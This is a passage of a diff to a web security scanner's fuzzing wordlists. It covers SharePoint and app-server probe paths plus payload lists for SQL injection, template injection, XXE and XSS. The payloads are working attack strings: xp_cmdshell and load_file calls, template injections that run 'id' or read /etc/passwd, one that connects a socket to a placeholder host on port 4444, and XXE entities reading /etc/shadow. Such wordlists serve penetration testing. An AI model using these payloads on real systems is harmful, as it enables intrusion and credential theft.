+_layouts/bdcadminui/editbdcaction.aspx
-_layouts/bdcadminui/exportbdcapplication.aspx  
+_layouts/bdcadminui/exportbdcapplication.aspx
 _layouts/bdcadminui/managepermissions.aspx
 _layouts/bdcadminui/viewbdcapplication.aspx
 _layouts/bdcadminui/viewbdcentity.aspx
@@ -696,18 +696,18 @@ _layouts/mngfield.aspx
 _layouts/mngsiteadmin.aspx
 _layouts/mngsubwebs.aspx
 _layouts/mngsubwebs.aspx?view=sites
-_layouts/mobile/bloghome.aspx          
+_layouts/mobile/bloghome.aspx
-_layouts/mobile/default.aspx           
+_layouts/mobile/default.aspx
-_layouts/mobile/delete.aspx            
+_layouts/mobile/delete.aspx
-_layouts/mobile/dispform.aspx  
+_layouts/mobile/dispform.aspx
-_layouts/mobile/disppost.aspx  
+_layouts/mobile/disppost.aspx
-_layouts/mobile/editform.aspx  
+_layouts/mobile/editform.aspx
-_layouts/mobile/mblerror.aspx  
+_layouts/mobile/mblerror.aspx
-_layouts/mobile/mbllists.aspx    
+_layouts/mobile/mbllists.aspx
-_layouts/mobile/mbllogin.aspx    
+_layouts/mobile/mbllogin.aspx
-_layouts/mobile/mbllogout.aspx   
+_layouts/mobile/mbllogout.aspx
-_layouts/mobile/mobileformserver.aspx  
+_layouts/mobile/mobileformserver.aspx
-_layouts/mobile/newcomment.aspx  
+_layouts/mobile/newcomment.aspx
 _layouts/mobile/newform.aspx
 _layouts/mobile/newpost.aspx
 _layouts/mobile/view.aspx
@@ -1026,7 +1026,7 @@ _vti_bin/webswsdl.aspx
 _vti_bin/workflow.asmx
 _vti_bin/wsdisco.aspx
 _vti_bin/wswsdl.aspx
-_vti_inf.html 
+_vti_inf.html
 _vti_pvt
 _wpresources
 accessdenied.aspx
@@ -1092,11 +1092,11 @@ backlinks.aspx
 barcodeimagefromitem.aspx
 bdcadminui/addbdcaction.aspx
 bdcadminui/addbdcapplication.aspx
-bdcadminui/addbdcapplication.aspx  
+bdcadminui/addbdcapplication.aspx
-bdcadminui/bdcapplications.aspx    
+bdcadminui/bdcapplications.aspx
-bdcadminui/bdcentities.aspx           
+bdcadminui/bdcentities.aspx
-bdcadminui/editbdcaction.aspx         
+bdcadminui/editbdcaction.aspx
-bdcadminui/exportbdcapplication.aspx  
+bdcadminui/exportbdcapplication.aspx
 bdcadminui/managepermissions.aspx
 bdcadminui/viewbdcapplication.aspx
 bdcadminui/viewbdcentity.aspx
@@ -1352,18 +1352,18 @@ mngfield.aspx
 mngsiteadmin.aspx
 mngsubwebs.aspx
 mngsubwebs.aspx?view=sites
-mobile/bloghome.aspx          
+mobile/bloghome.aspx
-mobile/default.aspx           
+mobile/default.aspx
-mobile/delete.aspx            
+mobile/delete.aspx
-mobile/dispform.aspx  
+mobile/dispform.aspx
-mobile/disppost.aspx  
+mobile/disppost.aspx
-mobile/editform.aspx  
+mobile/editform.aspx
-mobile/mblerror.aspx  
+mobile/mblerror.aspx
-mobile/mbllists.aspx    
+mobile/mbllists.aspx
-mobile/mbllogin.aspx    
+mobile/mbllogin.aspx
-mobile/mbllogout.aspx   
+mobile/mbllogout.aspx
-mobile/mobileformserver.aspx  
+mobile/mobileformserver.aspx
-mobile/newcomment.aspx  
+mobile/newcomment.aspx
 mobile/newform.aspx
 mobile/newpost.aspx
 mobile/view.aspx
@@ -1423,7 +1423,7 @@ pages/forms/allitems.aspx
 pages/forms/combine.aspx
 pages/forms/dispform.aspx
 pages/forms/editform.aspx
-pages/forms/webfldr.aspx 
+pages/forms/webfldr.aspx
 pagesettings.aspx
 pageversioninfo.aspx
 password.aspx
--- a/wordlists/vulnerabilities/sql.txt
+++ b/wordlists/vulnerabilities/sql.txt
@@ -1,34 +1,67 @@
-
+0
 0 or 1=1
 0x730065006c0065006300740020004000400076006500 ...
 0x77616974666F722064656C61792027303A303A313027 ...
 0x770061006900740066006F0072002000640065006C00 ...
 1 or 1=1
 1 or benchmark(10000000,MD5(1))#
 1 or pg_sleep(__TIME__)--
 1 or sleep(__TIME__)#
 1 waitfor delay '0:0:10'--
 1)) or benchmark(10000000,MD5(1))#
 1)) or pg_sleep(__TIME__)--
 1)) or sleep(__TIME__)#
 1) or benchmark(10000000,MD5(1))#
 1) or pg_sleep(__TIME__)--
 1) or sleep(__TIME__)#
 1;(load_file(char(47,101,116,99,47,112,97,115, ...
 1;SELECT%20*
 3.10E+17
 21 %
 23 OR 1=1
 26 %
 28 %
 29 %
 !
-"
+"));waitfor delay '0:0:__TIME__'--
-"%20or%20"x"="x
+")) or benchmark(10000000,MD5(1))#
-"' or 1 --'"
+")) or pg_sleep(__TIME__)--
-") or ("a"="a
+")) or sleep(__TIME__)="
-" or 0=0 #
+");waitfor delay '0:0:__TIME__'--
 ") or benchmark(10000000,MD5(1))#
 ") or pg_sleep(__TIME__)--
 ") or sleep(__TIME__)="
 ";waitfor delay '0:0:__TIME__'--
 "a"" or 1=1--"
 "a"" or 3=3--"
 "hi"") or (""a""=""a"
 " or 0=0 --
 " or 1=1 or ""="
 " or 1=1--
 " or "a"="a
-#
+" or benchmark(10000000,MD5(1))#
 " or isNULL(1/0) /*
 " or pg_sleep(__TIME__)--
 " or sleep(__TIME__)#
 # from wapiti
 %2A%7C
 %2A%28%7C%28mail%3D%2A%29%29
 %2A%28%7C%28objectclass%3D%2A%29%29
 %7C
 %20$(sleep%2050)
 %20'sleep%2050'
 %20or%20''='
 %20or%20'x'='x
 %20or%20x=x
 %20or%201=1
 %21
 %26
 %27%20or%201=1
 %28
 %29
 %C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11
 &
 &apos;%20OR
 &lt;&gt;&quot;'%;)(&amp;+
 '
 '%20--
 '%20;
 '%20or%20''='
 '%20or%20'x'='x
 '%20or%201=1
@@ -36,16 +69,18 @@
 ')%20or%20('x'='x
 ') or ('a'='a
 '; exec master..xp_cmdshell
 '; exec master..xp_cmdshell 'ping 172.10.1.255'--
 '; exec xp_regread
 ' UNION ALL SELECT
 ' UNION SELECT
 'hi' or 'x'='x';
 ' or 0=0 #
 ' or 0=0 --
-' or 1=1 or ''='
+' or 1 --'
 ' or 1=1
 ' or 1=1 or ''='
 ' or 1=1--
-'or%20select *
+' or 3=3
 ' or '1'='1'--
 ' or ''='
 ' or (EXISTS)
@@ -58,110 +93,176 @@
 'sqlattempt1
 '||UTL_HTTP.REQUEST
 (
 (select top 1
 (sqlattempt2)
 (sqlvuln)
 (||6)
 )
 )%20or%20('x'='x
 ));waitfor delay '0:0:__TIME__'--
 )) or benchmark(10000000,MD5(1))#
 )) or pg_sleep(__TIME__)--
 )) or sleep(__TIME__)='
 );waitfor delay '0:0:__TIME__'--
 ) or ('a'='a
 ) or (a=a
 ) or benchmark(10000000,MD5(1))#
 ) or pg_sleep(__TIME__)--
 ) or sleep(__TIME__)='
 ) union select * from information_schema.tables;
 *(|(mail=*))
 *(|(objectclass=*))
 */*
 *|
 +sqlvuln
 ,@variable
-
+ --
--
+ -- &password=
 --';
 --sp_password
 /
 /**/or/**/1/**/=/**/1
 //
 //*
 ; begin declare @var varchar(8000) set @var=' ...
 ; exec ('sel' + 'ect us' + 'er')
 ; exec master..xp_cmdshell
 ; exec master..xp_cmdshell 'ping 172.10.1.255'--
 ; execute immediate 'sel' || 'ect us' || 'er'
 ; exec xp_regread
 ; or '1'='1'
 ;waitfor delay '0:0:__TIME__'--
 <>"'%;)(&+
-=%20'
+?
 =%20--
 =%20;
@variable
@var select @var as var into temp end --
 PRINT
 PRINT @@variable
-\x3D%20\x3B'
+ UNION ALL SELECT
-\x3D%20\x27
+ UNION SELECT
 \x23
 \x27
 \x27UNION SELECT
-\x27\x4F\x52 SELECT *
+a'
-\x27\x6F\x72 SELECT *
+a' or 1=1--
-admin'--
+a' or 3=3--
 a' or 'a' = 'a
 a' waitfor delay '0:0:10'--
 admin' or '
 and 1 in (select var from temp)--
 and 1=( if((load_file(char(110,46,101,120,11 ...
 anything' OR 'x'='x
 as
 asc
 benchmark(10000000,MD5(1))#
 bfilename
 char%4039%41%2b%40SELECT
 declare @q nvarchar (200) 0x730065006c00650063 ...
 declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
 declare @q nvarchar (200) select @q = 0x770061 ...
 declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
 declare @q nvarchar (4000) select @q =
 declare @s varchar(22) select @s =
 declare @s varchar (200) select @s = 0x73656c6 ...
 declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
 declare @s varchar(200) select @s = 0x77616974 ...
 declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
 declare @s varchar (8000) select @s = 0x73656c ...
 delete
 desc
 distinct
 exec(@s)
 exec sp
 exec xp
 group by userid having 1=1--
 handler
 having
-hi") or ("a"="a
+ having 1=1--
 hi" or 1=1 --
 hi" or "a"="a
 hi') or ('a'='a
 hi' or 1=1 --
 hi' or 'a'='a
 hi' or 'x'='x';
 hi or 1=1 --"
 hi or a=a
 insert
 like
 limit
 or
 or 0=0 #
 or 0=0 #
 or 0=0 #"
 or 0=0 #"
 or 0=0 --
 or 0=0 --
 or 1 --'
 or 1 in (select @@version)--
 or 1/*
 or 1=1
 or 1=1
 or 1=1 --
 or 1=1 /*
 or 1=1 or ""=
 or 1=1 or ""=
 or 1=1 or ''='
 or 1=1--
 or 1=1--
 or 2 > 1
 or 2 between 1 and 3
 or 3=3
 or 3=3 --
 or%201=1
 or%201=1 --
 or '1'='1
 or '1'='1'--
 or '7659'='7659
 or ''='
 or 'a'='a
 or 'something' = 'some'+'thing'
 or 'text' = n'text'
 or 'text' > 't'
 or 'unusual' = 'unusual'
 or 'whatever' in ('whatever')
 or (EXISTS)
 or a=a
 or a=a
 or a = a
 or a=a--
 or a = a
 or benchmark(10000000,MD5(1))#
 order by
 or isNULL(1/0) /*
 or pg_sleep(__TIME__)--
 or sleep(__TIME__)#
 or sleep(__TIME__)='
 or username like char(37);
 password:*/=1--
 pg_sleep(__TIME__)--
 procedure
 replace
 select
 select * from information_schema.tables--
 select name from syscolumns where id = (sele ...
 sqlvuln
 sqlvuln;
 t'exec master..xp_cmdshell 'nslookup www.googl ...
 t'exec master..xp_cmdshell 'nslookup www.google.com'--
 to_timestamp_tz
 truncate
 tz_offset
 uni/**/on sel/**/ect
 union all select @@version--
 union select
 union select 1,load_file('/etc/passwd'),1,1,1;
 union select * from users where login = char ...
 update
 x' AND 1=(SELECT COUNT(*) FROM tabname); --
 x' AND email IS NULL; --
 x' AND members.email IS NULL; --
 x' AND userid IS NULL; --
 x' OR full_name LIKE '%Bob%
 x' or 1=1 or 'x'='y
 |
-1e100
+||6
-2 or 2=2
+||'6
-2' or '2'='2
+||(elt(-3+5,bin(15),ord(10),hex(char(45))))
-999999999999999999
+||UTL_HTTP.REQUEST
-" or 1=1#
+Ã½ or 1=1 --
-#mysql
+â or 1=1 --
-'
+â or 3=3 --
 '#mysql
 '/*ora_mysql*/and/**/'2'='0
 '/*ora_mysql*/and/**/'2'='2
 '/*ora_mysql*/or/**/'2'='2
 ' and '2'='0
 ' and '2'='0'#mysql
 ' and '2'='0'-- oracle
 ' and '2'='2
 ' and '2'='2'#mysql
 ' and '2'='2'-- oracle
 ' or 1=1--
 ' or '2'='2
 'test
 'test--
 --ora_sqls
 /*ora_mysql*/and/**/2=0
 /*ora_mysql*/and/**/2=2
 admin'
 admin'#
 admin'--
 and 1=1
 and 2=0
 and 2=0#mysql
 and 2=0-- oracle_mysql
 and 2=2#mysql
 and 2=2-- oracle_mysql
 and USER=USER
 and user()=user()
 now()
 or 1=1
 or 1=1#
 or 1=1--
 or 2=2
 order by 1--
--- a/wordlists/vulnerabilities/ssti.txt
+++ b/wordlists/vulnerabilities/ssti.txt
@@ -1,10 +1,19 @@
 42*42
 #{ 3 * 3 }
 #{3*3}
 #{ 7 * 7 }
 #{7*7}
 #{42*42}
 ${3*3}
 ${6*6}
 ${7*7}
 ${42*42}
 ${"freemarker.template.utility.Execute"?new()("id")}
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 ${T(java.lang.System).getenv()}
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}
 ${donotexists|42*42}
 ${self.__init__.__globals__['util'].os.system('id')}
 ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
 ${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
@@ -58,29 +67,50 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
 ${self.template.module.runtime.exceptions.util.os.system("id")}
 ${self.template.module.runtime.util.compat.inspect.os.system("id")}
 ${self.template.module.runtime.util.os.system("id")}
 ${{3*3}}
 ${{7*7}}
 ${{<%[%'"}}%\
 *{7*7}
 *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 <%= 3 * 3 %>
 <%= 7 * 7 %>
 <%= 7*7 %>
 <%=42*42 %>
 <%= File.open('/etc/passwd').read %>
@(1+2)
@(6+5)
 [7*7]
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
 [[${42*42}]]
 {42*42}
 {$smarty.version}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 {^xyzm42}1764{/xyzm42}
 {php}echo `id`;{/php}
 {{2*2}}[[3*3]]
 {{3*3}}
 {{3*'3'}}
 {{4*4}}[[5*5]]
 {{7*7}}
 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
 {{7*'7'}}
 {{42*42}}
 {{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 {{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 {{''.class.mro()[1].subclasses()}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
-{{'a'.toUpperCase()}} 
+{{'a'.toUpperCase()}}
 {{=42*42}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['id']|filter('system')}}
@@ -104,4 +134,5 @@ ${{7*7}}
 {{self._TemplateReference__context.cycler.__init__.__globals__.os}}
 {{self._TemplateReference__context.joiner.__init__.__globals__.os}}
 {{self._TemplateReference__context.namespace.__init__.__globals__.os}}
-{{self}}
+{{self}}
 {{{42*42}}}
--- a/wordlists/vulnerabilities/tomcat.txt
+++ b/wordlists/vulnerabilities/tomcat.txt
@@ -4,6 +4,9 @@ balancer
 dav
 deploy
 examples
 examples/%2e%2e/manager/html
 examples/%252e%252e/manager/html
 examples/../manager/html
 examples/jsp/index.html
 examples/jsp/snp/snoop.jsp
 examples/jsp/source.jsp
--- a/wordlists/vulnerabilities/weblogic.txt
+++ b/wordlists/vulnerabilities/weblogic.txt
@@ -1,8 +1,3 @@
 #HTTPClntRecv
 #bea_wls_internal/HTTPClntRecv
 #bea_wls_internal/HTTPClntRecv/*
 #bea_wls_internal/iiop/ClientRecv
 #bea_wls_internal/iiop/ClientRecv/*
 *
 *.gif
 *.gif/
@@ -39,6 +34,7 @@ HTTPClntClose
 HTTPClntClose/*
 HTTPClntLogin
 HTTPClntLogin/*
 HTTPClntRecv
 HTTPClntRecv/*
 HTTPClntSend
 HTTPClntSend/*
@@ -66,6 +62,7 @@ WebServiceServlet
 _async
 _async/*
 _async/AsyncResponseService
 _async/AsyncResponseService
 _async/AsyncResponseServiceHttps
 _async/AsyncResponseServiceJms
 _async/AsyncResponseServiceSoap12
@@ -80,6 +77,7 @@ actions
 admin/login.do
 applet
 applications
 appmanager
 appmanager/*
 asyncServlet
 asyncServlet/main.jsp
@@ -110,13 +108,14 @@ bea_wls_internal/HTTPClntClose
 bea_wls_internal/HTTPClntClose/*
 bea_wls_internal/HTTPClntLogin
 bea_wls_internal/HTTPClntLogin/*
 bea_wls_internal/HTTPClntRecv
 bea_wls_internal/HTTPClntRecv/*
 bea_wls_internal/HTTPClntSend
 bea_wls_internal/HTTPClntSend/*
 bea_wls_internal/WLDummyInitJVMIDs
 bea_wls_internal/WebServiceServlet
 bea_wls_internal/a2e2gp2r2/x.jsp
 bea_wls_internal/classes/
 bea_wls_internal/classes/ 
 bea_wls_internal/classes/*
 bea_wls_internal/classes/META-INF/MANIFEST.MF
 bea_wls_internal/com/*
@@ -126,6 +125,8 @@ bea_wls_internal/iiop/ClientClose
 bea_wls_internal/iiop/ClientClose/*
 bea_wls_internal/iiop/ClientLogin
 bea_wls_internal/iiop/ClientLogin/*
 bea_wls_internal/iiop/ClientRecv
 bea_wls_internal/iiop/ClientRecv/*
 bea_wls_internal/iiop/ClientSend
 bea_wls_internal/iiop/ClientSend/*
 bea_wls_internal/psquare/x.jsp
@@ -327,6 +328,7 @@ weblogic.testclient.CallbackHandler
 weblogic.wsee.async.AsyncResponseBean
 weblogic.wsee.async.AsyncResponseBeanSoap12
 weblogic.xml
 weblogic/ready
 webservice
 webservicesJwsSimpleEar
 webshare
@@ -341,6 +343,14 @@ wl_management_internal2/Bootstrap
 wl_management_internal2/FileDistribution
 wl_management_internal2/wl_management
 wliconsole
 wls-wsat/CoordinatorPortType
 wls-wsat/CoordinatorPortType11
 wls-wsat/ParticipantPortType
 wls-wsat/ParticipantPortType11
 wls-wsat/RegistrationPortTypeRPC
 wls-wsat/RegistrationPortTypeRPC11
 wls-wsat/RegistrationRequesterPortType
 wls-wsat/RegistrationRequesterPortType11
 wls_utc
 wls_utc4
 wls_utc/*.do
--- a/wordlists/vulnerabilities/websphere.txt
+++ b/wordlists/vulnerabilities/websphere.txt
@@ -47,7 +47,6 @@ DynaCacheESI/esiInavlidator
 DynamicQuery/EmployeeFinder
 DynamicQuery/EmployeeFinder/*
 DynamicQuery/docs/*
 ErrorPageApp
 ErrorReporter
 ErrorServlet
 FileTransfer
@@ -80,7 +79,6 @@ HitCount.jsp
 IBMDefaultErrorReporter
 IBMWebAS
 IBM_WS_SYS_RESPONSESERVLET
 IBM_WS_SYS_RESPONSESERVLET/*
 ISCAdminPortlet
 JTAExtensionsSamples/TransactionTracker
 JTAExtensionsSamples/TransactionTracker/*
@@ -89,7 +87,6 @@ MANIFEST.MF
 META-INF
 MessageDrivenBeans/docs/*
 MessageDrivenBeans/docsservlet/*
 MessageMigrationUtility
 OrderProcessorEJB/*
 OrderProcessorEJB/*.jsp
 OrderProcessorEJB/*.jsv
@@ -211,7 +208,6 @@ WebSphereSamples/
 WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
 WebSphereSamples/SingleSamples/Increment/increment.html
 WebSphereSamples/YourCo/main.html
 WebSphereTPHosts
 _DynaCacheEsi
 _DynaCacheEsi/*
 _DynaCacheEsi/esiInvalidator
@@ -231,7 +227,6 @@ apadminred.html
 aphtpasswd.html
 asynchbeans/*
 asynchbeans/docs/*
 auth_error.jsp
 cachemonitor
 cachemonitor/statistics.jsp
 cell.xml
@@ -244,7 +239,6 @@ config
 console
 contentapi
 debug_error.jsp
 ejb3sample/
 enabler
 error
 error.jsp
@@ -271,10 +265,8 @@ index.html
 index.jsp
 ivt
 ivt/*
 ivt/ivtAddition.jsp
 ivt/ivtDate.jsp
 ivt/ivtejb
 ivt/ivtserver
 ivt/ivtservler
 ivt/ivtservlet
 ivtejb
@@ -291,7 +283,9 @@ lwp/templatelibraryExport
 lwp/typeAhead
 manual
 manual/index.html
-nb
+mycontenthandler/
 mycontenthandler/wcmrest/
 mycontenthandler/wcmrest/Project
 node.xml
 nodes
 opc/*.jsp
@@ -304,11 +298,9 @@ opc/services/OrderTrackingIntfPort/wsdl/*
 opc/services/PurchaseOrderIntfPort
 opc/services/PurchaseOrderIntfPort/wsdl/*
 opt
 otis
 petstore
 petstore/*
 ping
 prm
 removeNodeListener
 replication
 resources.xml
@@ -333,7 +325,6 @@ servlet
 servlet/*
 servlet/ControllerServlet
 servlet/ErrorReporter
 servlet/HelloPervasiveServlet
 servlet/HelloWorldServlet
 servlet/HitCount
 servlet/SimpleServlet
@@ -349,51 +340,25 @@ servlet/com.ibm.servlet.engine.webapp.InvokerServlet
 servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
 servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
 servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
 servlet/com.ibm.websphere.management.wsdm.jaxws.AppServiceGroupService
 servlet/com.ibm.websphere.management.wsdm.jaxws.ApplicationServerService
 servlet/com.ibm.websphere.management.wsdm.jaxws.ApplicationService
 servlet/com.ibm.websphere.management.wsdm.jaxws.DataSourceService
 servlet/com.ibm.websphere.management.wsdm.jaxws.DomainResourcesServiceGroupService
 servlet/com.ibm.websphere.management.wsdm.jaxws.EJBService
 servlet/com.ibm.websphere.management.wsdm.jaxws.J2EEFactoryService
 servlet/com.ibm.websphere.management.wsdm.jaxws.JVMService
 servlet/com.ibm.websphere.management.wsdm.jaxws.JaxrpcWebServiceService
 servlet/com.ibm.websphere.management.wsdm.jaxws.JaxwsWebServiceService
 servlet/com.ibm.websphere.management.wsdm.jaxws.ServiceGroupService
 servlet/com.ibm.websphere.management.wsdm.jaxws.ServletService
 servlet/com.ibm.websphere.management.wsdm.jaxws.WebServiceService
 servlet/com.ibm.websphere.management.wsdm.jaxws.WebSphereClusterService
 servlet/com.ibm.websphere.management.wsdm.jaxws.WebSphereDomainService
 servlet/com.ibm.ws.websvcs.transport.http.AsyncResponseServlet
 servlet/hello
 servlet/ivtEJBClient
 servlet/ivtServer
 servlet/ivtServlet
 servlet/java.lang.Throwable
 servlet/snoop
 servlet/snoop2
 servletcache
 showCfg
 sibstatus
 sibws
 simple.jsp
 simpleJSP
 sm
 snoop
 snoop2
 snoop/*
 soaphttp
 statistics.jsp
 status
 statuspoll
 theme
 tradetheme
 transfer
 uddigui
 uddigui/*
 uddisoap
 uddisoap/*
 uddiv3soap
 variables.xml
 very_simple.jsp
 virtualhosts.xml
@@ -402,6 +367,7 @@ wasPerfTool/*
 wasPerfToolservlet
 wasPerfToolservlet/*
 wasportlet
 wcmrest/
 web.xml
 webapp
 webapp/examples/ErrorServlet
@@ -415,23 +381,6 @@ webapp/examples/showcfg
 webapp/examples/simple.jsp
 webapp/examples/verify
 webexec
 websphere-management
 websphere-management/services/application
 websphere-management/services/application-service-group
 websphere-management/services/applicationserver
 websphere-management/services/datasource
 websphere-management/services/domain-resources-service-group
 websphere-management/services/ejb
 websphere-management/services/factory
 websphere-management/services/jaxrpcwebservices
 websphere-management/services/jaxwswebservices
 websphere-management/services/jvm
 websphere-management/services/service-group
 websphere-management/services/servlet
 websphere-management/services/vm-service-group
 websphere-management/services/webservices
 websphere-management/services/webspherecluster
 websphere-management/services/webspheredomain
 wim
 workarea/*
 workarea/docs/*
@@ -555,7 +504,16 @@ wps/wcmimport
 wps/wcmsearchseed
 wps/wprs
 wps/wsdl/*
 wps/wsrp/WSRPBaseService_v2
 wps/wsrp/WSRPBaseService_v2/*
 wps/wsrp/WSRPPortletManagementService
 wps/wsrp/WSRPPortletManagementService/*
 wps/wsrp/WSRPPortletManagementService_v2
 wps/wsrp/WSRPPortletManagementService_v2/*
 wps/wsrp/WSRPServiceDescriptionService
 wps/wsrp/WSRPServiceDescriptionService/*
 wps/wsrp/WSRPServiceDescriptionService_v2
 wps/wsrp/WSRPServiceDescriptionService_v2/*
 wps/wsrp/WsrpProxyPortlet
 wps_semanticTag
 wsgwsoaphttp1
 wsgwsoaphttp2
 wsrp
--- a/wordlists/vulnerabilities/xml.txt
+++ b/wordlists/vulnerabilities/xml.txt
@@ -1,15 +0,0 @@
 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
 <name>','')); phpinfo(); exit;/*</name>
 <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 count(/child::node())
 x' or name()='username' or 'x'='y
--- a/wordlists/vulnerabilities/xss.txt
+++ b/wordlists/vulnerabilities/xss.txt
--- a/wordlists/vulnerabilities/xxe.txt
+++ b/wordlists/vulnerabilities/xxe.txt
@@ -0,0 +1,51 @@
 %foo;
 &foo;
 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
